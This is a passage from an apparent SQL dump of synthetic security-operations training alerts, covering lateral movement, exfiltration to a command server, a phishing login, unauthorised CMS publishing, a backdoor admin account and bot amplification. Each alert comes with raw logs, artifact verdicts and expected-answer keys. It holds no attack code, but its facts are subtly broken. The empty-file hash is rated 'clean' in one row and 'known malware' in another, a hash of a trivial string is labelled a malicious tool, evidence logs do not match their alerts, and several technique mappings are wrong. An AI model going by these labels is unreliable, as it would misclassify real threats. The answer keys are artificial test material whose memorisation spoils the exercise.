startup\\\",\\\"executed_by\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"aria-body.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(479, 'Lateral Movement Detected Across Internal Network', 'high', 'Network Traffic Analysis', 'Using stolen credentials, the attacker moves laterally within the network, targeting additional systems to widen their access and control. The attacker used RDP connections to access a critical server using the account j.doe.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"protocol\":\"RDP\",\"username\":\"j.doe\",\"event\":\"Successful login\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious.exe\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal asset database\",\"verdict\":\"internal\",\"details\":\"Internal company server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal user database\",\"verdict\":\"suspicious\",\"details\":\"Account accessed from external IP\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"File associated with lateral movement activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(480, 'Data Exfiltration to Command and Control Server', 'high', 'Firewall Logs', 'Sensitive data has been exfiltrated from the internal network to an external command and control server. The attacker used a domain that mimics a legitimate regional government site to avoid detection. This activity is consistent with Naikon APT operations focused on espionage.', 'Data Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:37:22Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.56\",\"src_port\":45678,\"dst_port\":443,\"protocol\":\"TCP\",\"action\":\"ALLOW\",\"hostname\":\"internal-host.local\",\"domain\":\"gov-info-update.com\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"filename\":\"confidential_report.pdf\",\"event_id\":\"FW-EXFIL-20231015-001\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Naikon APT.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"gov-info-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_watch\",\"verdict\":\"suspicious\",\"details\":\"Domain mimics a legitimate government site, commonly used for phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malicious exfiltration tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive information and was involved in exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(481, 'Suspicious Login Detected', 'medium', 'CMS Security Logs', 'An unauthorized login attempt was detected on the news website\'s CMS. The user\'s credentials were likely harvested through a phishing email. The attempt was made from a known malicious IP address.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-07T14:23:56Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"username\":\"j.smith@newswebsite.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\",\"login_status\":\"failed\",\"reason\":\"invalid_credentials\",\"related_email\":\"phishing_campaign@maliciousdomain.com\",\"malicious_url\":\"http://maliciousdomain.com/login\",\"hash\":\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.smith@newswebsite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Registered CMS user.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used in phishing campaigns to harvest credentials.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"phishing_campaign@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used for phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential-stealing malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-07T14:23:56Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"j.smith@newswebsite.com\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"invalid_credentials\\\",\\\"related_email\\\":\\\"phishing_campaign@maliciousdomain.com\\\",\\\"malicious_url\\\":\\\"http://maliciousdomain.com/login\\\",\\\"hash\\\":\\\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(482, 'Unauthorized CMS Article Publication', 'high', 'Website Change Log', 'An unauthorized publication of articles detected on the CMS. Attackers utilized stolen credentials to disseminate false narratives aiming to influence public opinion through misinformation.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"cms-2023-unauth-pub-002\",\"user\":\"compromised_editor\",\"ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.25\",\"modified_files\":[\"/var/www/cms/articles/fake-news-001.html\",\"/var/www/cms/articles/fake-news-002.html\"],\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action_taken\":\"Published\",\"timestamp_publish\":\"2023-10-15T13:44:55Z\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous misinformation campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_editor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Access Logs\",\"verdict\":\"internal\",\"details\":\"Username with elevated permissions used in unauthorized actions.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Empty file or common default hash, requires further investigation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.090Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:30Z\\\",\\\"event_id\\\":\\\"cms-2023-unauth-pub-002\\\",\\\"user\\\":\\\"compromised_editor\\\",\\\"ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"modified_files\\\":[\\\"/var/www/cms/articles/fake-news-001.html\\\",\\\"/var/www/cms/articles/fake-news-002.html\\\"],\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action_taken\\\":\\\"Published\\\",\\\"timestamp_publish\\\":\\\"2023-10-15T13:44:55Z\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(483, 'Backdoor Account Creation', 'high', 'User Account Activity Report', 'An attacker has created a new user account with administrative privileges on the CMS to maintain persistent access.', 'Persistence', 'T1136: Create Account', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"user_account_creation\",\"user\":\"adminuser1\",\"created_by\":\"attacker_account\",\"created_at\":\"2023-10-05T14:20:00Z\",\"ip_address\":\"192.168.1.25\",\"external_ip\":\"203.0.113.5\",\"new_account\":{\"username\":\"backdooradmin\",\"privileges\":\"administrator\",\"creation_method\":\"web_interface\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"cms_user_mgmt.php\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"backdooradmin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Newly created account with admin privileges.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"Common hash associated with empty files.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"cms_user_mgmt.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File related to user management in CMS.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(484, 'Social Media Amplification Detected', 'medium', 'Social Media Monitoring Tools', 'A bot network was detected disseminating fake articles across various social media platforms, amplifying false narratives.', 'Lateral Movement', 'T1090 - Connection Proxy', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_id\":\"SMAT-4567\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"username\":\"social_bot_user\",\"filename\":\"amplification_script.py\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://examplemalicioussite.com/fake-news\",\"action\":\"post\",\"platform\":\"SocialMediaNet\",\"article_title\":\"Breaking News: Major Event Unfolds\",\"article_id\":\"art-7890\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known botnet activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Recognized internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"social_bot_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual behavior detected.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"amplification_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Script used for spreading misinformation.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"http://examplemalicioussite.com/fake-news\",\"is_critical\":true,\"osint_result\":{\"source\":\"Web Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Site used for hosting fake 